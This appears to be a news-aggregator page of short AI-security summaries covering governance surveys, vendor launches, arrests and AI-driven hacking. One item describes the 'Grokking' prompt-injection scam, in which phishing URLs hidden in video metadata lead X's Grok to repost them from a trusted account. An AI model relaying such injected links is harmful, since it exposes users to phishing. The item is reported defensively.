All news with #ai security tag
Tue, October 14, 2025
UK Firms Lose Average $3.9M to Unmanaged AI Risk in UK
⚠️ EY polling of 100 UK firms finds that nearly all respondents (98%) experienced financial losses from AI-related risks over the past year, with an average loss of $3.9m per company. The most common issues were regulatory non-compliance, inaccurate or poor-quality training data and high energy usage affecting sustainability goals. The report highlights governance shortfalls — only 17% of C-suite leaders could identify appropriate controls — and warns about the risks posed by unregulated “citizen developer” AI activity. EY recommends adopting comprehensive responsible AI governance, targeted C-suite training and formal policies for agentic AI.
Tue, October 14, 2025
Stopping Living-off-the-Land Abuse of Trusted Tools
🔒 CrowdStrike highlights how attackers increasingly weaponize trusted software—RMM tools, built-in Windows utilities, and admin binaries—to evade detection and operate within networks. The Falcon platform layers behavioral IOAs, custom controls, and Exposure Management and now adds APEX, a machine-learning model that analyzes command-line syntax, parameters, process lineage, timing, and context to detect LOLbin abuse. APEX is generally available for Windows and aims to raise detection while reducing false positives.
Mon, October 13, 2025
Rewiring Democracy: New Book on AI's Political Impact
📘 My latest book, Rewiring Democracy: How AI Will Transform Our Politics, Government, and Citizenship, will be published in just over a week. Two sample chapters (12 and 34 of 43) are available to read now, and copies can be ordered widely; signed editions are offered from my site. I’m asking readers and colleagues to help the book make a splash by leaving reviews, creating social posts, making a TikTok video, or sharing it on community platforms such as SlashDot.
Mon, October 13, 2025
Building a Lasting Security Culture at Microsoft Initiative
🔐 Microsoft frames security culture as a company-wide movement driven by people and operationalized through the Secure Future Initiative (SFI). The company overhauled employee education—launching the Microsoft Security Academy, refreshing the Security Foundations series, and requiring three annual sessions (90 minutes total)—to address AI-enabled attacks, deepfakes, and identity threats. Leadership mandates, linked compensation, measurable training outcomes (99% completion; rising satisfaction and relevancy scores), new identity and AI guides, Deputy CISOs in engineering, and embedded DevSecOps are highlighted as evidence of measurable cultural change.
Mon, October 13, 2025
Spain Arrests Leader of GXC Team Phishing Operation
🚨 Spanish authorities have arrested a 25-year-old Brazilian national accused of leading the GXC Team, a Crime-as-a-Service operation that sold phishing kits, Android malware and AI-based tools to cybercriminals. The Guardia Civil detained the suspect known as "GoogleXcoder" after a year-long investigation and six coordinated raids across Spain. Investigators seized devices containing source code, client communications and cryptocurrency records, and identified six suspected accomplices. The probe, supported by Group-IB and Brazil's Federal Police, remains ongoing as authorities disable the group's online infrastructure.
Mon, October 13, 2025
Varonis Interceptor: Multimodal AI Email Defense Platform
🛡️ Varonis introduces Interceptor, an AI-native email security solution that combines multimodal AI—visual, linguistic, and behavioral models—to detect advanced phishing, BEC, and social engineering. It augments or replaces API-based filters with a phishing sandbox that pre-analyzes newly registered domains and URLs and a lightweight browser extension for multichannel protection. Integrated with the Varonis Data Security Platform, Interceptor aims to reduce false positives, accelerate detection of zero-hour threats, and stop breaches earlier in the attack chain.
Mon, October 13, 2025
Weekly Recap: WhatsApp Worm, Oracle 0-Day and Ransomware
⚡This weekly recap covers high-impact incidents and emerging trends shaping enterprise risk. Significant exploitation of an Oracle E-Business Suite zero-day (CVE-2025-61882) and linked payloads reportedly affected dozens of organizations, while a GoAnywhere MFT flaw (CVE-2025-10035) enabled multi-stage intrusions by Storm-1175. Other highlights include a WhatsApp worm, npm-based phishing chains, an emerging ransomware cartel, AI abuse, and a prioritized list of critical CVEs.
Mon, October 13, 2025
AI Governance: Building a Responsible Foundation Today
🔒 AI governance is a business-critical priority that lets organizations harness AI benefits while managing regulatory, data, and reputational risk. Establishing cross-functional accountability and adopting recognized frameworks such as ISO 42001:2023, the NIST AI RMF, and the EU AI Act creates practical guardrails. Leaders must invest in AI literacy and human-in-the-loop oversight. Governance should be adaptive and continuously improved.
Mon, October 13, 2025
AI Ethical Risks, Governance Boards, and AGI Perspectives
🔍 Paul Dongha, NatWest's head of responsible AI and former data and AI ethics lead at Lloyds, highlights the ethical red flags CISOs and boards must monitor when deploying AI. He calls out threats to human agency, technical robustness, data privacy, transparency, bias and the need for clear accountability. Dongha recommends mandatory ethics boards with diverse senior representation and a chief responsible AI officer to oversee end-to-end risk management. He also urges integrating audit and regulatory engagement into governance.
Mon, October 13, 2025
AI and the Future of American Politics: 2026 Outlook
🔍 The essay examines how AI is reshaping U.S. politics heading into the 2026 midterms, with campaign professionals, organizers, and ordinary citizens adopting automated tools to write messaging, target voters, run deliberative platforms, and mobilize supporters. Campaign vendors from Quiller to BattlegroundAI are streamlining fundraising, ad creation, and research, while civic groups and unions experiment with AI for outreach and internal organizing. Absent meaningful regulation, these capabilities scale rapidly and raise risks ranging from decontextualized persuasion and registration interference to state surveillance and selective suppression of political speech.
Mon, October 13, 2025
AI-aided malvertising: Chatbot prompt-injection scams
🔍 Cybercriminals have abused X's AI assistant Grok to amplify phishing links hidden in paid video posts, a tactic researchers have dubbed 'Grokking.' Attackers embed malicious URLs in video metadata and then prompt the bot to identify the video's source, causing it to repost the link from a trusted account. The technique bypasses ad platform link restrictions and can reach massive audiences, boosting SEO and domain reputation. Treat outputs from public AI tools as untrusted and verify links before clicking.
Fri, October 10, 2025
Security Risks of Vibe Coding and LLM Developer Assistants
🛡️AI developer assistants accelerate coding but introduce significant security risks across generated code, configurations, and development tools. Studies show models now compile code far more often yet still produce many OWASP- and MITRE-class vulnerabilities, and real incidents (for example Tea, Enrichlead, and the Nx compromise) highlight practical consequences. Effective defenses include automated SAST, security-aware system prompts, human code review, strict agent access controls, and developer training.
Fri, October 10, 2025
Navigating Public Sector Cybersecurity: AI and Zero Trust
🔒 As CSO for Google Public Sector, the post frames an urgency-driven approach to modern government security, emphasizing AI-powered threat detection, Zero Trust engineering, and a shared responsibility model. It highlights how Google Security Operations (FedRAMP High), fused threat intelligence from VirusTotal and Mandiant, and fast incident response strengthen mission continuity. The piece stresses that legacy defenses are insufficient against AI-enhanced adversaries and calls for proactive, intelligence-led modernization.
Fri, October 10, 2025
Google Launches AI Vulnerability Reward Program for AI
🔒 Google has launched an AI Vulnerability Reward Program (AI VRP) offering base rewards up to $20,000 and up to $30,000 with multipliers for validated AI-product bugs. The program moves AI-related reports from the Abuse VRP into a dedicated stream to simplify submissions and unify reward assessment. In-scope products include Search, Gemini apps and Workspace, and qualifying issues cover data exfiltration, phishing enablement and model theft. Content-focused prompt injections and jailbreaks remain out of scope and should be reported via in-product tools.
Fri, October 10, 2025
Autonomous AI Hacking and the Future of Cybersecurity
⚠️AI agents are now autonomously conducting cyberattacks, chaining reconnaissance, exploitation, persistence, and data theft at machine speed and scale. In 2025 public demonstrations—from XBOW’s mass submissions on HackerOne in June, to DARPA teams and Google’s Big Sleep in August—along with operational reports from Ukraine’s CERT and vendors, show these systems rapidly find and weaponize new flaws. Criminals have operationalized LLM-driven malware and ransomware, while tools like HexStrike‑AI, Deepseek, and Villager make automated attack chains broadly available. Defenders can also leverage AI to accelerate vulnerability research and operationalize VulnOps, continuous discovery/continuous repair, and self‑healing networks, but doing so raises serious questions about patch correctness, liability, compatibility, and vendor relationships.
Fri, October 10, 2025
The AI SOC Stack of 2026: What Separates Top Platforms
🤖 As organizations scale and threats increase in sophistication and velocity, SOCs are integrating AI to augment detection, investigation, and response. The market ranges from prompt-dependent copilots to autonomous, mesh agentic systems that coordinate specialized AI agents across triage, correlation, and remediation. Leading solutions prioritize contextual intelligence, non-disruptive integration, staged trust, and measurable ROI rather than promising hands-off autonomy.
Fri, October 10, 2025
it-sa Highlights: Vendor Security and Access Solutions
🔒 At it-sa vendors unveiled a slate of security, privacy and access offerings aimed at strengthening enterprise controls. Salesforce expanded its AI Agentforce into the Security Center and Privacy Center to automate threat detection, incident remediation and compliance prioritization. Ivanti reengineered Connect Secure 25.x with a security‑by‑design architecture including SELinux, WAF, secure boot and disk encryption. Additional launches included Samsung Knox mobile credentials, KOBIL mPower and a Zurich/Deutsche Telekom cyber insurance plus MDR integration.
Fri, October 10, 2025
Move Beyond the CIA Triad: A Layered Security Model
🔐 The article contends that the Cold War–era CIA triad (confidentiality, integrity, availability) is too narrow for modern threats driven by cloud, AI, and fragile supply chains. It proposes the 3C Model—Core, Complementary, Contextual—to elevate authenticity, accountability, and resilience as foundational pillars rather than afterthoughts. The framework aims to harmonize standards, reduce duplication, and help CISOs speak in terms of survival, trust, and business impact instead of only uptime and technical controls.
Fri, October 10, 2025
CrowdStrike Named Visionary in 2025 Gartner SIEM Placement
🔍 CrowdStrike Falcon Next‑Gen SIEM has been named a Visionary in the 2025 Gartner Magic Quadrant for Security Information and Event Management. The product is presented as an agentic SOC engine that combines AI-driven detections, real-time telemetry and a unified data foundation to accelerate detection and response. CrowdStrike cites metrics including 150x faster search, over 1PB/day ingestion and up to 80% cost savings, and highlights the acquisition of Onum to improve real-time pipelines and scale. New AI agents for workflow, data transformation, search analysis and correlation rule generation aim to simplify playbook creation, data prep and detection tuning.
Fri, October 10, 2025
Six steps for disaster recovery and business continuity
🔒 Modernize disaster recovery and continuity with six practical steps for CISOs. Secure executive funding and form a cross-functional team, map risks and locate data across cloud, SaaS, OT, and edge devices, and conduct a Business Impact Analysis to define a Minimal Viable Business (MVB). Evolve backups to 3-2-1-1-0 with immutable or air-gapped copies, adopt BaaS/DRaaS and AI-driven tools for discovery and autonomous backups, and run realistic, gamified tests followed by post-mortems.